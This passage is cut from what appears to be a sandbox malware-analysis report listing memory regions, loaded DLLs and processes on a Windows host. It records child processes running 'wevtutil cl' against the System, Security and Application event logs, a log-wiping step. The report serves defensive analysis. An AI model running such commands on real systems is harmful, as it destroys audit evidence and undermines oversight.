"private_0x0000000076fd0000" filename = "" Region: id = 653 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 654 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 655 start_va = 0x5d0000 end_va = 0x757fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 656 start_va = 0x762b0000 end_va = 0x7637bfff entry_point = 0x762b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 657 start_va = 0x76b90000 end_va = 0x76beffff entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 658 start_va = 0x30000 end_va = 0x3afff entry_point = 0x30000 region_type = mapped_file name = "wevtutil.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wevtutil.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wevtutil.exe.mui") Region: id = 659 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 660 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 661 start_va = 0x100000 end_va = 0x101fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000100000" filename = "" Region: id = 662 start_va = 0x760000 end_va = 0x8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 663 start_va = 0xe90000 end_va = 0x228ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e90000" filename = "" Region: id = 664 start_va = 0x744c0000 end_va = 0x7465dfff entry_point = 0x744ee6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 665 start_va = 0x76890000 end_va = 0x768e6fff entry_point = 0x768a9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Thread: id = 24 os_tid = 0x9e8 Thread: id = 25 os_tid = 0x9ec Process: id = "8" image_name = "wevtutil.exe" filename = "c:\\windows\\syswow64\\wevtutil.exe" page_root = "0x6e2c7000" os_pid = "0x9f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9d0" cmd_line = "wevtutil cl System " cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 666 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 667 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 668 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 669 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 670 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 671 start_va = 0xa0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 672 start_va = 0xe0000 end_va = 0x11ffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 673 start_va = 0x330000 end_va = 0x35cfff entry_point = 0x3335ed region_type = mapped_file name = "wevtutil.exe" filename = "\\Windows\\SysWOW64\\wevtutil.exe" (normalized: "c:\\windows\\syswow64\\wevtutil.exe") Region: id = 674 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 675 start_va = 0x772b0000 end_va = 0x7742ffff entry_point = 0x772b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 676 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 677 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 678 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 679 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 680 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 681 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 682 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 683 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 684 start_va = 0x74710000 end_va = 0x7476bfff entry_point = 0x7474f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 685 start_va = 0x74770000 end_va = 0x747aefff entry_point = 0x7479de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 686 start_va = 0x74dd0000 end_va = 0x74dd7fff entry_point = 0x74dd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 687 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 688 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 689 start_va = 0x120000 end_va = 0x186fff entry_point = 0x120000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 690 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 691 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 692 start_va = 0x748d0000 end_va = 0x74911fff entry_point = 0x748d1360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\SysWOW64\\wevtapi.dll" (normalized: "c:\\windows\\syswow64\\wevtapi.dll") Region: id = 693 start_va = 0x749c0000 end_va = 0x749eafff entry_point = 0x749c14af region_type = mapped_file name = "credui.dll" filename = "\\Windows\\SysWOW64\\credui.dll" (normalized: "c:\\windows\\syswow64\\credui.dll") Region: id = 694 start_va = 0x74e00000 end_va = 0x74e0bfff entry_point = 0x74e010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 695 start_va = 0x74e10000 end_va = 0x74e6ffff entry_point = 0x74e2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 696 start_va = 0x74e70000 end_va = 0x74f7ffff entry_point = 0x74e832d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 697 start_va = 0x75e00000 end_va = 0x75f5bfff entry_point = 0x75e4ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 698 start_va = 0x75f60000 end_va = 0x75ffffff entry_point = 0x75f749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 699 start_va = 0x76020000 end_va = 0x7610ffff entry_point = 0x76030569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 700 start_va = 0x76110000 end_va = 0x7619efff entry_point = 0x76113fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 701 start_va = 0x76480000 end_va = 0x7657ffff entry_point = 0x7649b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 702 start_va = 0x76580000 end_va = 0x7661cfff entry_point = 0x765b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 703 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 704 start_va = 0x76940000 end_va = 0x769ebfff entry_point = 0x7694a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 705 start_va = 0x76b20000 end_va = 0x76b65fff entry_point = 0x76b27478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 706 start_va = 0x76b70000 end_va = 0x76b88fff entry_point = 0x76b74975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 707 start_va = 0x76bf0000 end_va = 0x76c7ffff entry_point = 0x76c06343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 708 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x0 region_type = private name = "private_0x0000000076eb0000" filename = "" Region: id = 709 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fd0000" filename = "" Region: id = 710 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 711 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 712 start_va = 0x4f0000 end_va = 0x677fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 713 start_va = 0x762b0000 end_va = 0x7637bfff entry_point = 0x762b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 714 start_va = 0x76b90000 end_va = 0x76beffff entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 715 start_va = 0x30000 end_va = 0x3afff entry_point = 0x30000 region_type = mapped_file name = "wevtutil.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wevtutil.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wevtutil.exe.mui") Region: id = 716 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 717 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 718 start_va = 0x90000 end_va = 0x91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 719 start_va = 0x680000 end_va = 0x800fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 720 start_va = 0x810000 end_va = 0x1c0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000810000" filename = "" Region: id = 721 start_va = 0x74320000 end_va = 0x744bdfff entry_point = 0x7434e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 722 start_va = 0x76890000 end_va = 0x768e6fff entry_point = 0x768a9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Thread: id = 26 os_tid = 0x9f4 Thread: id = 27 os_tid = 0x9f8 Process: id = "9" image_name = "wevtutil.exe" filename = "c:\\windows\\syswow64\\wevtutil.exe" page_root = "0x6e80c000" os_pid = "0x9fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9d0" cmd_line = "wevtutil cl Security " cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 723 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 724 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 725 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 726 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 727 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 728 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 729 start_va = 0x230000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 730 start_va = 0x6e0000 end_va = 0x70cfff entry_point = 0x6e35ed region_type = mapped_file name = "wevtutil.exe" filename = "\\Windows\\SysWOW64\\wevtutil.exe" (normalized: "c:\\windows\\syswow64\\wevtutil.exe") Region: id = 731 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 732 start_va = 0x772b0000 end_va = 0x7742ffff entry_point = 0x772b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 733 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 734 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 735 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 736 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 737 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 738 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 739 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 740 start_va = 0x440000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 741 start_va = 0x74710000 end_va = 0x7476bfff entry_point = 0x7474f798 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 742 start_va = 0x74770000 end_va = 0x747aefff entry_point = 0x7479de78 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 743 start_va = 0x74dd0000 end_va = 0x74dd7fff entry_point = 0x74dd20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 744 start_va = 0x76eb0000 end_va = 0x76fcefff entry_point = 0x0 region_type = private name = "private_0x0000000076eb0000" filename = "" Region: id = 745 start_va = 0x76fd0000 end_va = 0x770c9fff entry_point = 0x0 region_type = private name = "private_0x0000000076fd0000" filename = "" Region: id = 746 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 747 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 748 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 749 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 750 start_va = 0x8e0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 751 start_va = 0x749a0000 end_va = 0x749e1fff entry_point = 0x749a1360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\SysWOW64\\wevtapi.dll" (normalized: "c:\\windows\\syswow64\\wevtapi.dll") Region: id = 752 start_va = 0x749f0000 end_va = 0x74a1afff entry_point = 0x749f14af region_type = mapped_file name = "credui.dll" filename = "\\Windows\\SysWOW64\\credui.dll" (normalized: "c:\\windows\\syswow64\\credui.dll") Region: id = 753 start_va = 0x74e00000 end_va = 0x74e0bfff entry_point = 0x74e010e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 754 start_va = 0x74e10000 end_va = 0x74e6ffff entry_point = 0x74e2a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 755 start_va = 0x74e70000 end_va = 0x74f7ffff entry_point = 0x74e832d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 756 start_va = 0x75e00000 end_va = 0x75f5bfff entry_point = 0x75e4ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 757 start_va = 0x75f60000 end_va = 0x75ffffff entry_point = 0x75f749e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 758 start_va = 0x76020000 end_va = 0x7610ffff entry_point = 0x76030569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 759 start_va = 0x76110000 end_va = 0x7619efff entry_point = 0x76113fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 760 start_va = 0x76480000 end_va = 0x7657ffff entry_point = 0x7649b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 761 start_va = 0x76580000 end_va = 0x7661cfff entry_point = 0x765b3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 762 start_va = 0x768f0000 end_va = 0x768f9fff entry_point = 0x768f36a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 763 start_va = 0x76940000 end_va = 0x769ebfff entry_point = 0x7694a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 764 start_va = 0x76b20000 end_va = 0x76b65fff entry_point = 0x76b27478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 765 start_va = 0x76b70000 end_va = 0x76b88fff entry_point = 0x76b74975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 766 start_va = 0x76bf0000 end_va = 0x76c7ffff entry_point = 0x76c06343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 767 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 768 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 769 start_va = 0x4c0000 end_va = 0x647fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 770 start_va = 0x762b0000 end_va = 0x7637bfff entry_point = 0x762b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 771 start_va = 0x76b90000 end_va = 0x76beffff entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 772 start_va = 0x30000 end_va = 0x3afff entry_point = 0x30000 region_type = mapped_file name = "wevtutil.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\wevtutil.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wevtutil.exe.mui") Region: id = 773 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 774 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 775 start_va = 0x90000 end_va = 0x91fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 776 start_va = 0x710000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 777 start_va = 0x9e0000 end_va = 0x1ddffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009e0000" filename = "" Region: id = 778 start_va = 0x744c0000 end_va = 0x7465dfff entry_point = 0x744ee6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 779 start_va = 0x76890000 end_va = 0x768e6fff entry_point = 0x768a9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Thread: id = 28 os_tid = 0xa00 Thread: id = 29 os_tid = 0xa04 Process: id = "10" image_name = "wevtutil.exe" filename = "c:\\windows\\syswow64\\wevtutil.exe" page_root = "0x6e8d1000" os_pid = "0xa08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0x9d0" cmd_line = "wevtutil cl Application " cur_dir = "C:\\Windows\\system32\\" os_username = "1R6PFH\\hJrD1KOKY DS8lUjv" os_groups = "1R6PFH\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e144" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 780 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 781 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 782 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 783 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 784 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 785 start_va = 0x110000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 786 start_va = 0x1c0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 787 start_va = 0xdd0000 end_va = 0xdfcfff entry_point = 0xdd35ed region_type = mapped_file name = "wevtutil.exe" filename = "\\Windows\\SysWOW64\\wevtutil.exe" (normalized: "c:\\windows\\syswow64\\wevtutil.exe") Region: id = 788 start_va = 0x770d0000 end_va = 0x77278fff entry_point = 0x770d0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 789 start_va = 0x772b0000 end_va = 0x7742ffff entry_point = 0x772b0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 790 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 791 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 792 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 793 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 794 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 795 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = 